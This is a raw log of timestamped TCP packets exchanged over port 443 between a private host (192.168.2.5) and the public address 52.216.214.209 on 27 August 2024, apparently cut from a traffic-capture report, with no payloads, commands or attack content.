                                                Aug 27, 2024 12:55:16.231240034 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.231291056 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.231298923 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.231338024 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.231743097 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.231756926 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.231810093 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.231816053 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.231856108 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.319566965 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.319583893 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.319715023 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.319729090 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.319819927 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.320168972 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.320213079 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.320244074 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.320255041 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.320266008 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.320306063 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.320739031 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.320754051 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.320821047 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.320827961 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.320883989 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.320995092 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.321010113 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.321094036 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.321101904 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.321154118 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.321578979 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.321594000 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.321667910 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.321674109 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.321701050 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.321748018 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.322294950 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.322313070 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.322370052 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.322376013 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.322386980 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.322408915 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.322408915 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.322418928 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.322432041 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.322468042 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.322557926 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.322948933 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.342298031 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.342313051 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.342432976 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.342441082 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.342495918 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.407171011 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.407186031 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.407293081 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.407303095 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.407345057 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.407571077 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.407591105 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.407633066 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.407639980 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.407677889 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.408384085 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.408401966 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.408447027 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.408447027 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.408454895 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.408510923 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.408510923 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.408834934 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.408849955 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.408916950 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.408926010 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.408936024 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.408974886 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.409171104 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.409188986 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.409251928 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.409251928 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.409260035 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.409328938 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.409776926 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.409801960 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.409858942 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.409858942 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.409866095 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.409909010 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.410024881 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.410039902 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.410151005 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.410151005 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.410157919 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.410223007 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.431878090 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.431895018 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.431981087 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.431991100 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.432054996 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.494818926 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.494834900 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.494954109 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.494954109 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.494976997 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.495039940 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.495343924 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.495357037 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.495445013 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.495454073 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.495537996 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.495938063 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.495958090 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.496016026 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.496016979 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.496028900 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.496057034 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.496095896 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.496104002 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.496117115 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.496187925 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.496866941 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.496893883 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.496942043 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.496948004 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.496972084 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.496973991 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.496998072 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.497006893 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.497030020 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.497071028 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.497071028 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.497081995 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.497102022 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.497169018 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.497847080 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.497863054 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.497925043 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.497932911 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.497971058 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.504441023 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.519732952 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.519747019 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.519831896 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.519843102 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.519917011 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.582369089 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.582395077 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.582492113 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.582514048 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.582609892 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.582820892 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.582834959 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.582911015 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.582918882 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.582987070 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.583364010 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.583376884 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.583427906 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.583435059 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.583458900 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.583503008 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.583941936 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.583956003 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.584031105 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.584038973 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.584079027 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.584079027 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.584495068 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.584508896 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.584573984 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.584582090 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.584650993 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.584959984 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.584974051 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.585021973 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.585025072 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.585033894 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.585050106 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.585083008 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.585091114 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.585108042 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.585212946 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.607300997 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.607316017 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.607408047 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.607420921 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.607470989 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.690028906 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.690046072 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.690279007 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.690301895 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.690356016 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.690465927 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.690479994 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.690562963 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.690570116 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.690655947 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.690867901 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.690884113 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.690958977 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.690967083 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.691018105 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.691498041 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.691512108 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.691579103 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.691586971 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.691639900 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.692068100 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.692087889 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.692147970 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.692156076 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.692167044 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.692229033 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.692457914 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.692472935 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.692529917 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.692538023 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.692552090 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.692630053 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.693157911 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.693178892 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.693242073 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.693248987 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.693278074 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.693337917 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.729671955 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.729715109 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.729804993 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.729820013 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.729857922 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.729871988 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.777473927 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.777489901 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.777571917 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.777590036 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.777714014 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.778152943 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.778165102 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.778247118 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.778254032 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.778310061 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.778470039 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.778484106 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.778552055 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.778552055 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.778561115 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.778604984 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.779138088 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.779150009 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.779206991 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.779215097 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.779292107 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.779659033 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.779673100 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.779731035 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.779738903 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.779871941 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.780184031 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.780199051 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.780291080 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.780297995 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.780348063 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.780797958 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.780812979 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.780862093 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.780870914 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.780904055 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.780904055 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.780932903 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.821686983 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.821702957 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.821921110 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.821932077 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.821990013 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.867891073 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.867907047 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.867971897 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.867980957 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.868025064 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.868025064 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.868133068 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.868148088 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.868233919 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.868241072 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.868324995 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.868773937 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.868788004 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.868860960 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.868874073 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.868966103 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.869633913 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.869647980 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.869723082 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.869731903 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.869788885 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.869940042 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.869954109 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.870009899 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.870017052 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.870055914 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.870055914 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.870405912 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.870419025 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.870474100 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.870481968 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.870531082 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.870995045 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.871010065 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.871093035 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.871100903 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.871180058 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.909146070 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.909159899 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.909238100 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.909245968 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.909332991 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.955293894 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.955308914 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.955379009 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.955387115 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.955404043 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.955440998 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.955766916 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.955781937 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.955852985 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.955861092 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.955914021 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.956151962 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.956171036 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.956254005 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.956254005 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.956262112 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.956316948 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.956676960 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.956691980 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.956754923 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.956762075 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.956809998 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.957623959 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.957643986 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.957707882 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.957715988 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:16.957736015 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:16.957797050 CEST49707443192.168.2.552.216.214.209
